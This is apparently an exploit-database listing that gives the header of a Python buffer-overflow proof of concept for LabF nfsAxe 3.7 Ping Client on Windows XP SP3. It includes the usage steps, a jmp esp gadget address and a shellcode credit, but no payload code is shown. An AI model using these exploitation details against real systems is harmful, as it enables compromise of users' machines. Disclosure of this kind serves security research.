Exploits / Vulnerability Discovered: 2019-04-22 | Type: local | Platform: windows
[+] Code ...
#!/usr/bin/python
# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
# Date: 20-04-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: http://www.labf.com/nfsaxe
# Version: 3.7
# Software Link : http://www.labf.com/download/nfsaxe.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP SP3 ENG x86
# CVE: TBC from Mitre
# PoC:
# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
# 2.) In the application (ping.exe), paste the contents of the clipboard into "Host IP" and click OK.
# 3.) Click Start and calc pops
# 0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
# Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)